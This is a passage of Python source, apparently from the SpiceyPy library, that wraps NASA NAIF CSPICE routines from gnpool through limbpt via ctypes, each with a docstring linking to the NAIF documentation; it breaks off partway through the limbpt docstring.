def gnpool(name, start, room, lenout=_default_len_out):
"""
Return names of kernel variables matching a specified template.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/gnpool_c.html
:param name: Template that names should match.
:type name: str
:param start: Index of first matching name to retrieve.
:type start: int
:param room: The largest number of values to return.
:type room: int
:param lenout: Length of strings in output array kvars.
:type lenout: int
:return: Kernel pool variables whose names match name.
:rtype: list of str
"""
name = stypes.stringToCharP(name)
start = ctypes.c_int(start)
kvars = stypes.emptyCharArray(yLen=room, xLen=lenout)
room = ctypes.c_int(room)
lenout = ctypes.c_int(lenout)
n = ctypes.c_int()
found = ctypes.c_int()
libspice.gnpool_c(name, start, room, lenout, ctypes.byref(n), kvars,
ctypes.byref(found))
return stypes.cVectorToPython(kvars)[0:n.value], bool(found.value)
################################################################################
# H
@spiceErrorCheck
def halfpi():
"""
Return half the value of pi (the ratio of the circumference of
a circle to its diameter).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/halfpi_c.html
:return: Half the value of pi.
:rtype: float
"""
return libspice.halfpi_c()
@spiceErrorCheck
def hrmint(xvals, yvals, x):
"""
Evaluate a Hermite interpolating polynomial at a specified
abscissa value.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/hrmint_c.html
:param xvals: Abscissa values.
:type xvals: Array of floats
:param yvals: Ordinate and derivative values.
:type yvals: Array of floats
:param x: Point at which to interpolate the polynomial.
:type x: int
:return: Interpolated function value at x and the Interpolated function's derivative at x
:rtype: tuple
"""
work = stypes.emptyDoubleVector(int(2*len(yvals)+1))
n = ctypes.c_int(len(xvals))
xvals = stypes.toDoubleVector(xvals)
yvals = stypes.toDoubleVector(yvals)
x = ctypes.c_double(x)
f = ctypes.c_double(0)
df = ctypes.c_double(0)
libspice.hrmint_c(n, xvals, yvals, x, work, f, df)
return f.value, df.value
@spiceErrorCheck
def hx2dp(string):
"""
Convert a string representing a double precision number in a
base 16 scientific notation into its equivalent double
precision number.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/hx2dp_c.html
:param string: Hex form string to convert to double precision.
:type string: str
:return: Double precision value to be returned, Or Error Message.
:rtype: float or str
"""
string = stypes.stringToCharP(string)
lenout = ctypes.c_int(80)
errmsg = stypes.stringToCharP(lenout)
number = ctypes.c_double()
error = ctypes.c_int()
libspice.hx2dp_c(string, lenout, ctypes.byref(number), ctypes.byref(error),
errmsg)
if not error.value:
return number.value
else:
return stypes.toPythonString(errmsg)
################################################################################
# I
@spiceErrorCheck
def ident():
"""
This routine returns the 3x3 identity matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ident_c.html
:return: The 3x3 identity matrix.
:rtype: 3x3-Element Array of floats
"""
matrix = stypes.emptyDoubleMatrix()
libspice.ident_c(matrix)
return stypes.cMatrixToNumpy(matrix)
@spiceErrorCheck
def illum(target, et, abcorr, obsrvr, spoint):
"""
Deprecated: This routine has been superseded by the CSPICE
routine ilumin. This routine is supported for purposes of
backward compatibility only.
Find the illumination angles at a specified surface point of a
target body.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/illum_c.html
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000.
:type et: float
:param abcorr: Desired aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param spoint: Body-fixed coordinates of a target surface point.
:type spoint: 3-Element Array of floats
:return:
Phase angle,
Solar incidence angle,
and Emission angle at the surface point.
:rtype: tuple
"""
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.toDoubleVector(spoint)
phase = ctypes.c_double(0)
solar = ctypes.c_double(0)
emissn = ctypes.c_double(0)
libspice.illum_c(target, et, abcorr, obsrvr, spoint, ctypes.byref(phase),
ctypes.byref(solar), ctypes.byref(emissn))
return phase.value, solar.value, emissn.value
@spiceErrorCheck
def illumf(method, target, ilusrc, et, fixref, abcorr, obsrvr, spoint):
"""
Compute the illumination angles---phase, incidence, and
emission---at a specified point on a target body. Return logical
flags indicating whether the surface point is visible from
the observer's position and whether the surface point is
illuminated.
The target body's surface is represented using topographic data
provided by DSK files, or by a reference ellipsoid.
The illumination source is a specified ephemeris object.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/illumf_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param ilusrc: Name of illumination source.
:type ilusrc: str
:param et: Epoch in ephemeris seconds past J2000.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Desired aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param spoint: Body-fixed coordinates of a target surface point.
:type spoint: 3-Element Array of floats
:return: Target surface point epoch, Vector from observer to target
surface point, Phase angle at the surface point, Source incidence
angle at the surface point, Emission angle at the surface point,
Visibility flag, Illumination flag
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
ilusrc = stypes.stringToCharP(ilusrc)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.toDoubleVector(spoint)
trgepc = ctypes.c_double(0)
srfvec = stypes.emptyDoubleVector(3)
phase = ctypes.c_double(0)
incdnc = ctypes.c_double(0)
emissn = ctypes.c_double(0)
visibl = ctypes.c_int()
lit = ctypes.c_int()
libspice.illumf_c(method, target, ilusrc, et, fixref, abcorr, obsrvr, spoint,
ctypes.byref(trgepc), srfvec, ctypes.byref(phase),
ctypes.byref(incdnc), ctypes.byref(emissn),
ctypes.byref(visibl), ctypes.byref(lit))
return trgepc.value, stypes.cVectorToPython(srfvec), \
phase.value, incdnc.value, emissn.value, bool(visibl.value), bool(lit.value)
@spiceErrorCheck
def illumg(method, target, ilusrc, et, fixref, abcorr, obsrvr, spoint):
"""
Find the illumination angles (phase, incidence, and
emission) at a specified surface point of a target body.
The surface of the target body may be represented by a triaxial
ellipsoid or by topographic data provided by DSK files.
The illumination source is a specified ephemeris object.
param method: Computation method.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/illumg_c.html
:type method: str
:param target: Name of target body.
:type target: str
:param ilusrc: Name of illumination source.
:type ilusrc: str
:param et: Epoch in ephemeris seconds past J2000.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Desired aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param spoint: Body-fixed coordinates of a target surface point.
:type spoint: 3-Element Array of floats
:return: Target surface point epoch, Vector from observer to target
surface point, Phase angle at the surface point, Source incidence
angle at the surface point, Emission angle at the surface point,
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
ilusrc = stypes.stringToCharP(ilusrc)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.toDoubleVector(spoint)
trgepc = ctypes.c_double(0)
srfvec = stypes.emptyDoubleVector(3)
phase = ctypes.c_double(0)
incdnc = ctypes.c_double(0)
emissn = ctypes.c_double(0)
libspice.illumg_c(method, target, ilusrc, et, fixref, abcorr, obsrvr, spoint,
ctypes.byref(trgepc), srfvec, ctypes.byref(phase),
ctypes.byref(incdnc), ctypes.byref(emissn))
return trgepc.value, stypes.cVectorToPython(srfvec), \
phase.value, incdnc.value, emissn.value
@spiceErrorCheck
def ilumin(method, target, et, fixref, abcorr, obsrvr, spoint):
"""
Find the illumination angles (phase, solar incidence, and
emission) at a specified surface point of a target body.
This routine supersedes illum.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ilumin_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Desired aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param spoint: Body-fixed coordinates of a target surface point.
:type spoint: 3-Element Array of floats
:return: Target surface point epoch, Vector from observer to target
surface point, Phase angle, Solar incidence angle, and Emission
angle at the surface point.
:rtype: tuple
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.toDoubleVector(spoint)
trgepc = ctypes.c_double(0)
srfvec = stypes.emptyDoubleVector(3)
phase = ctypes.c_double(0)
solar = ctypes.c_double(0)
emissn = ctypes.c_double(0)
libspice.ilumin_c(method, target, et, fixref, abcorr, obsrvr, spoint,
ctypes.byref(trgepc),
srfvec, ctypes.byref(phase), ctypes.byref(solar),
ctypes.byref(emissn))
return trgepc.value, stypes.cVectorToPython(
srfvec), phase.value, solar.value, emissn.value
@spiceErrorCheck
@spiceFoundExceptionThrower
def inedpl(a, b, c, plane):
"""
Find the intersection of a triaxial ellipsoid and a plane.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inedpl_c.html
:param a: Length of ellipsoid semi-axis lying on the x-axis.
:type a: float
:param b: Length of ellipsoid semi-axis lying on the y-axis.
:type b: float
:param c: Length of ellipsoid semi-axis lying on the z-axis.
:type c: float
:param plane: Plane that intersects ellipsoid.
:type plane: spiceypy.utils.support_types.Plane
:return: Intersection ellipse.
:rtype: spiceypy.utils.support_types.Ellipse
"""
assert (isinstance(plane, stypes.Plane))
ellipse = stypes.Ellipse()
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
found = ctypes.c_int()
libspice.inedpl_c(a, b, c, ctypes.byref(plane), ctypes.byref(ellipse),
ctypes.byref(found))
return ellipse, bool(found.value)
@spiceErrorCheck
def inelpl(ellips, plane):
"""
Find the intersection of an ellipse and a plane.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inelpl_c.html
:param ellips: A SPICE ellipse.
:type plane: spiceypy.utils.support_types.Ellipse
:param plane: A SPICE plane.
:type plane: spiceypy.utils.support_types.Plane
:return:
Number of intersection points of plane and ellipse,
Point 1,
Point 2.
:rtype: tuple
"""
assert (isinstance(plane, stypes.Plane))
assert (isinstance(ellips, stypes.Ellipse))
nxpts = ctypes.c_int()
xpt1 = stypes.emptyDoubleVector(3)
xpt2 = stypes.emptyDoubleVector(3)
libspice.inelpl_c(ctypes.byref(ellips), ctypes.byref(plane),
ctypes.byref(nxpts), xpt1, xpt2)
return nxpts.value, stypes.cVectorToPython(xpt1), stypes.cVectorToPython(xpt2)
@spiceErrorCheck
def inrypl(vertex, direct, plane):
"""
Find the intersection of a ray and a plane.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inrypl_c.html
:param vertex: Vertex vector of ray.
:type vertex: 3-Element Array of floats
:param direct: Direction vector of ray.
:type direct: 3-Element Array of floats
:param plane: A SPICE plane.
:type plane: spiceypy.utils.support_types.Plane
:return:
Number of intersection points of ray and plane,
Intersection point,
if nxpts == 1.
:rtype: tuple
"""
assert (isinstance(plane, stypes.Plane))
vertex = stypes.toDoubleVector(vertex)
direct = stypes.toDoubleVector(direct)
nxpts = ctypes.c_int()
xpt = stypes.emptyDoubleVector(3)
libspice.inrypl_c(vertex, direct, ctypes.byref(plane), ctypes.byref(nxpts),
xpt)
return nxpts.value, stypes.cVectorToPython(xpt)
@spiceErrorCheck
def insrtc(item, inset):
"""
Insert an item into a character set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/insrtc_c.html
:param item: Item to be inserted.
:type item: str or list of str
:param inset: Insertion set.
:type inset: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(inset, stypes.SpiceCell)
if isinstance(item, list):
for c in item:
libspice.insrtc_c(stypes.stringToCharP(c), ctypes.byref(inset))
else:
item = stypes.stringToCharP(item)
libspice.insrtc_c(item, ctypes.byref(inset))
@spiceErrorCheck
def insrtd(item, inset):
"""
Insert an item into a double precision set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/insrtd_c.html
:param item: Item to be inserted.
:type item: Union[float,Iterable[float]]
:param inset: Insertion set.
:type inset: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(inset, stypes.SpiceCell)
if hasattr(item, "__iter__"):
for d in item:
libspice.insrtd_c(ctypes.c_double(d), ctypes.byref(inset))
else:
item = ctypes.c_double(item)
libspice.insrtd_c(item, ctypes.byref(inset))
@spiceErrorCheck
def insrti(item, inset):
"""
Insert an item into an integer set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/insrti_c.html
:param item: Item to be inserted.
:type item: Union[float,Iterable[int]]
:param inset: Insertion set.
:type inset: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(inset, stypes.SpiceCell)
if hasattr(item, "__iter__"):
for i in item:
libspice.insrti_c(ctypes.c_int(i), ctypes.byref(inset))
else:
item = ctypes.c_int(item)
libspice.insrti_c(item, ctypes.byref(inset))
@spiceErrorCheck
def inter(a, b):
"""
Intersect two sets of any data type to form a third set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inter_c.html
:param a: First input set.
:type a: spiceypy.utils.support_types.SpiceCell
:param b: Second input set.
:type b: spiceypy.utils.support_types.SpiceCell
:return: Intersection of a and b.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(a, stypes.SpiceCell)
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == b.dtype
# Next line was redundant with [raise NotImpImplementedError] below
# assert a.dtype == 0 or a.dtype == 1 or a.dtype == 2
if a.dtype is 0:
c = stypes.SPICECHAR_CELL(max(a.size, b.size), max(a.length, b.length))
elif a.dtype is 1:
c = stypes.SPICEDOUBLE_CELL(max(a.size, b.size))
elif a.dtype is 2:
c = stypes.SPICEINT_CELL(max(a.size, b.size))
else:
raise NotImplementedError
libspice.inter_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
return c
@spiceErrorCheck
def intmax():
"""
Return the value of the largest (positive) number representable
in a int variable.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/intmax_c.html
:return: The largest (positive) number representablein a Int variable.
:rtype: int
"""
return libspice.intmax_c()
@spiceErrorCheck
def intmin():
"""
Return the value of the smallest (negative) number representable
in a SpiceInt variable.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/intmin_c.html
:return: The smallest (negative) number representablein a Int variable.
:rtype: int
"""
return libspice.intmin_c()
@spiceErrorCheck
def invert(m):
"""
Generate the inverse of a 3x3 matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/invert_c.html
:param m: Matrix to be inverted.
:type m: 3x3-Element Array of floats
:return: Inverted matrix (m1)^-1
:rtype: 3x3-Element Array of floats
"""
m = stypes.toDoubleMatrix(m)
mout = stypes.emptyDoubleMatrix()
libspice.invert_c(m, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def invort(m):
"""
Given a matrix, construct the matrix whose rows are the
columns of the first divided by the length squared of the
the corresponding columns of the input matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/invort_c.html
:param m: A 3x3 Matrix.
:type m: 3x3-Element Array of floats
:return: m after transposition and scaling of rows.
:rtype: 3x3-Element Array of floats
"""
m = stypes.toDoubleMatrix(m)
mout = stypes.emptyDoubleMatrix()
libspice.invort_c(m, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def isordv(array, n):
"""
Determine whether an array of n items contains the integers
0 through n-1.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isordv_c.html
:param array: Array of integers.
:type array: Array of ints
:param n: Number of integers in array.
:type n: int
:return:
The function returns True if the array contains the
integers 0 through n-1, otherwise it returns False.
:rtype: bool
"""
array = stypes.toIntVector(array)
n = ctypes.c_int(n)
return bool(libspice.isordv_c(array, n))
@spiceErrorCheck
def isrchc(value, ndim, lenvals, array):
"""
Search for a given value within a character string array. Return
the index of the first matching array entry, or -1 if the key
value was not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrchc_c.html
:param value: Key value to be found in array.
:type value: str
:param ndim: Dimension of array.
:type ndim: int
:param lenvals: String length.
:type lenvals: int
:param array: Character string array to search.
:type array: list of str
:return:
The index of the first matching array element or -1
if the value is not found.
:rtype: int
"""
value = stypes.stringToCharP(value)
array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=ndim)
ndim = ctypes.c_int(ndim)
lenvals = ctypes.c_int(lenvals)
return libspice.isrchc_c(value, ndim, lenvals, array)
@spiceErrorCheck
def isrchd(value, ndim, array):
"""
Search for a given value within a double precision array. Return
the index of the first matching array entry, or -1 if the key value
was not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrchd_c.html
:param value: Key value to be found in array.
:type value: float
:param ndim: Dimension of array.
:type ndim: int
:param array: Double Precision array to search.
:type array: Array of floats
:return:
The index of the first matching array element or -1
if the value is not found.
:rtype: int
"""
value = ctypes.c_double(value)
ndim = ctypes.c_int(ndim)
array = stypes.toDoubleVector(array)
return libspice.isrchd_c(value, ndim, array)
@spiceErrorCheck
def isrchi(value, ndim, array):
"""
Search for a given value within an integer array. Return
the index of the first matching array entry, or -1 if the key
value was not found.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrchi_c.html
:param value: Key value to be found in array.
:type value: int
:param ndim: Dimension of array.
:type ndim: int
:param array: Integer array to search.
:type array: Array of ints
:return:
The index of the first matching array element or -1
if the value is not found.
:rtype: int
"""
value = ctypes.c_int(value)
ndim = ctypes.c_int(ndim)
array = stypes.toIntVector(array)
return libspice.isrchi_c(value, ndim, array)
@spiceErrorCheck
def isrot(m, ntol, dtol):
"""
Indicate whether a 3x3 matrix is a rotation matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrot_c.html
:param m: A matrix to be tested.
:type m: 3x3-Element Array of floats
:param ntol: Tolerance for the norms of the columns of m.
:type ntol: float
:param dtol:
Tolerance for the determinant of a matrix whose columns
are the unitized columns of m.
:type dtol: float
:return: True if and only if m is a rotation matrix.
:rtype: bool
"""
m = stypes.toDoubleMatrix(m)
ntol = ctypes.c_double(ntol)
dtol = ctypes.c_double(dtol)
return bool(libspice.isrot_c(m, ntol, dtol))
@spiceErrorCheck
def iswhsp(string):
"""
Return a boolean value indicating whether a string contains
only white space characters.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/iswhsp_c.html
:param string: String to be tested.
:type string: str
:return:
the boolean value True if the string is empty or contains
only white space characters; otherwise it returns the value False.
:rtype: bool
"""
string = stypes.stringToCharP(string)
return bool(libspice.iswhsp_c(string))
################################################################################
# J
@spiceErrorCheck
def j1900():
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j1900_c.html
:return: Julian Date of 1899 DEC 31 12:00:00
:rtype: float
"""
return libspice.j1900_c()
@spiceErrorCheck
def j1950():
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j1950_c.html
:return: Julian Date of 1950 JAN 01 00:00:00
:rtype: float
"""
return libspice.j1950_c()
@spiceErrorCheck
def j2000():
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j2000_c.html
:return: Julian Date of 2000 JAN 01 12:00:00
:rtype: float
"""
return libspice.j2000_c()
@spiceErrorCheck
def j2100():
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j2100_c.html
:return: Julian Date of 2100 JAN 01 12:00:00
:rtype: float
"""
return libspice.j2100_c()
@spiceErrorCheck
def jyear():
"""
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/jyear_c.html
:return: number of seconds in a julian year
:rtype: float
"""
return libspice.jyear_c()
################################################################################
# K
@spiceErrorCheck
def kclear():
"""
Clear the KEEPER subsystem: unload all kernels, clear the kernel
pool, and re-initialize the subsystem. Existing watches on kernel
variables are retained.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kclear_c.html
"""
libspice.kclear_c()
@spiceErrorCheck
@spiceFoundExceptionThrower
def kdata(which, kind, fillen=_default_len_out, typlen=_default_len_out, srclen=_default_len_out):
"""
Return data for the nth kernel that is among a list of specified
kernel types.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kdata_c.html
:param which: Index of kernel to fetch from the list of kernels.
:type which: int
:param kind: The kind of kernel to which fetches are limited.
:type kind: str
:param fillen: Available space in output file string.
:type fillen: int
:param typlen: Available space in output kernel type string.
:type typlen: int
:param srclen: Available space in output source string.
:type srclen: int
:return:
The name of the kernel file, The type of the kernel,
Name of the source file used to load file,
The handle attached to file.
:rtype: tuple
"""
which = ctypes.c_int(which)
kind = stypes.stringToCharP(kind)
fillen = ctypes.c_int(fillen)
typlen = ctypes.c_int(typlen)
srclen = ctypes.c_int(srclen)
file = stypes.stringToCharP(fillen)
filtyp = stypes.stringToCharP(typlen)
source = stypes.stringToCharP(srclen)
handle = ctypes.c_int()
found = ctypes.c_int()
libspice.kdata_c(which, kind, fillen, typlen, srclen, file, filtyp, source,
ctypes.byref(handle), ctypes.byref(found))
return stypes.toPythonString(file), stypes.toPythonString(
filtyp), stypes.toPythonString(source), handle.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def kinfo(file, typlen=_default_len_out, srclen=_default_len_out):
"""
Return information about a loaded kernel specified by name.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kinfo_c.html
:param file: Name of a kernel to fetch information for
:type file: str
:param typlen: Available space in output kernel type string.
:type typlen: int
:param srclen: Available space in output source string.
:type srclen: int
:return:
The type of the kernel,
Name of the source file used to load file,
The handle attached to file.
:rtype: tuple
"""
typlen = ctypes.c_int(typlen)
srclen = ctypes.c_int(srclen)
file = stypes.stringToCharP(file)
filtyp = stypes.stringToCharP(" " * typlen.value)
source = stypes.stringToCharP(" " * srclen.value)
handle = ctypes.c_int()
found = ctypes.c_int()
libspice.kinfo_c(file, typlen, srclen, filtyp, source, ctypes.byref(handle),
ctypes.byref(found))
return stypes.toPythonString(filtyp), stypes.toPythonString(
source), handle.value, bool(found.value)
@spiceErrorCheck
def kplfrm(frmcls, outCell=None):
"""
Return a SPICE set containing the frame IDs of all reference
frames of a given class having specifications in the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kplfrm_c.html
:param frmcls: Frame class.
:type frmcls: int
:param outCell: Optional output Spice Int Cell
:type outCell: spiceypy.utils.support_types.SpiceCell
:return: Set of ID codes of frames of the specified class.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
if not outCell:
outCell = stypes.SPICEINT_CELL(1000)
frmcls = ctypes.c_int(frmcls)
libspice.kplfrm_c(frmcls, ctypes.byref(outCell))
return outCell
@spiceErrorCheck
def ktotal(kind):
"""
Return the current number of kernels that have been loaded
via the KEEPER interface that are of a specified type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ktotal_c.html
:param kind: A list of kinds of kernels to count.
:type kind: str
:return: The number of kernels of type kind.
:rtype: int
"""
kind = stypes.stringToCharP(kind)
count = ctypes.c_int()
libspice.ktotal_c(kind, ctypes.byref(count))
return count.value
@spiceErrorCheck
@spiceFoundExceptionThrower
def kxtrct(keywd, terms, nterms, instring, termlen=_default_len_out, stringlen=_default_len_out, substrlen=_default_len_out):
"""
Locate a keyword in a string and extract the substring from
the beginning of the first word following the keyword to the
beginning of the first subsequent recognized terminator of a list.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kxtrct_c.html
:param keywd: Word that marks the beginning of text of interest.
:type keywd: str
:param terms: Set of words, any of which marks the end of text.
:type terms: Array of str
:param nterms: Number of terms.
:type nterms: int
:param instring: String containing a sequence of words.
:type instring: str
:param termlen: Length of strings in string array term.
:type termlen: int
:param stringlen: Available space in argument string.
:type stringlen: int
:param substrlen: Available space in output substring.
:type substrlen: int
:return:
String containing a sequence of words,
String from end of keywd to beginning of first terms item found.
:rtype: tuple
"""
assert nterms <= len(terms)
# Python strings and string arrays => to C char pointers
keywd = stypes.stringToCharP(keywd)
terms = stypes.listToCharArrayPtr([s[:termlen-1] for s in terms[:nterms]],xLen=termlen,yLen=nterms)
instring = stypes.stringToCharP(instring[:stringlen-1],inlen=stringlen)
substr = stypes.stringToCharP(substrlen)
# Python ints => to C ints
termlen = ctypes.c_int(termlen)
nterms = ctypes.c_int(nterms)
stringlen = ctypes.c_int(stringlen)
substrlen = ctypes.c_int(substrlen)
found = ctypes.c_int()
libspice.kxtrct_c(keywd, termlen, terms, nterms,
stringlen, substrlen, instring, ctypes.byref(found),
substr)
return stypes.toPythonString(instring), stypes.toPythonString(
substr), bool(found.value)
################################################################################
# L
@spiceErrorCheck
def lastnb(string):
"""
Return the zero based index of the last non-blank character in
a character string.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lastnb_c.html
:param string: Input character string.
:type string: str
:return: :rtype:
"""
string = stypes.stringToCharP(string)
return libspice.lastnb_c(string)
@spiceErrorCheck
def latcyl(radius, lon, lat):
"""
Convert from latitudinal coordinates to cylindrical coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latcyl_c.html
:param radius: Distance of a point from the origin.
:type radius:
:param lon: Angle of the point from the XZ plane in radians.
:param lat: Angle of the point from the XY plane in radians.
:return: (r, lonc, z)
:rtype: tuple
"""
radius = ctypes.c_double(radius)
lon = ctypes.c_double(lon)
lat = ctypes.c_double(lat)
r = ctypes.c_double()
lonc = ctypes.c_double()
z = ctypes.c_double()
libspice.latcyl_c(radius, lon, lat, ctypes.byref(r), ctypes.byref(lonc),
ctypes.byref(z))
return r.value, lonc.value, z.value
@spiceErrorCheck
def latrec(radius, longitude, latitude):
"""
Convert from latitudinal coordinates to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latrec_c.html
:param radius: Distance of a point from the origin.
:type radius: float
:param longitude: Longitude of point in radians.
:type longitude: float
:param latitude: Latitude of point in radians.
:type latitude: float
:return: Rectangular coordinates of the point.
:rtype: 3-Element Array of floats
"""
radius = ctypes.c_double(radius)
longitude = ctypes.c_double(longitude)
latitude = ctypes.c_double(latitude)
rectan = stypes.emptyDoubleVector(3)
libspice.latrec_c(radius, longitude, latitude, rectan)
return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def latsph(radius, lon, lat):
"""
Convert from latitudinal coordinates to spherical coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsph_c.html
:param radius: Distance of a point from the origin.
:param lon: Angle of the point from the XZ plane in radians.
:param lat: Angle of the point from the XY plane in radians.
:return: (rho colat, lons)
:rtype: tuple
"""
radius = ctypes.c_double(radius)
lon = ctypes.c_double(lon)
lat = ctypes.c_double(lat)
rho = ctypes.c_double()
colat = ctypes.c_double()
lons = ctypes.c_double()
libspice.latsph_c(radius, lon, lat, ctypes.byref(rho), ctypes.byref(colat),
ctypes.byref(lons))
return rho.value, colat.value, lons.value
@spiceErrorCheck
def latsrf(method, target, et, fixref, lonlat):
"""
Map array of planetocentric longitude/latitude coordinate pairs
to surface points on a specified target body.
The surface of the target body may be represented by a triaxial
ellipsoid or by topographic data provided by DSK files.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsrf_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in TDB seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param lonlat: Array of longitude/latitude coordinate pairs.
:type lonlat: A 2xM-Element Array of floats
:return: Array of surface points.
:rtype: A 3xM-Element Array of floats
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
npts = ctypes.c_int(len(lonlat))
lonlat = stypes.toDoubleMatrix(lonlat)
srfpts = stypes.emptyDoubleMatrix(3, npts.value)
libspice.latsrf_c(method, target, et, fixref, npts, lonlat, srfpts)
return stypes.cMatrixToNumpy(srfpts)
@spiceErrorCheck
def lcase(instr, lenout=_default_len_out):
"""
Convert the characters in a string to lowercase.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lcase_c.html
:param instr: Input string.
:type instr: str
:param lenout: Maximum length of output string.
:type lenout: int
:return: Output string, all lowercase.
:rtype: str
"""
instr = stypes.stringToCharP(instr)
lenout = ctypes.c_int(lenout)
outstr = stypes.stringToCharP(lenout)
libspice.lcase_c(instr, lenout, outstr)
return stypes.toPythonString(outstr)
@spiceErrorCheck
def ldpool(filename):
"""
Load the variables contained in a NAIF ASCII kernel file into the
kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ldpool_c.html
:param filename: Name of the kernel file.
:type filename: str
"""
filename = stypes.stringToCharP(filename)
libspice.ldpool_c(filename)
@spiceErrorCheck
def limbpt(method, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp, ncuts, schstp, soltol, maxn):
"""
Find limb points on a target body. The limb is the set of points
of tangency on the target of rays emanating from the observer.
The caller specifies half-planes bounded by the observer-target
center vector in which to search for limb points.
The surface of the target body may be represented either by a
triaxial ellipsoid or by topographic data.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/limbpt_c.html
:param method: Computation method.
:type method: str
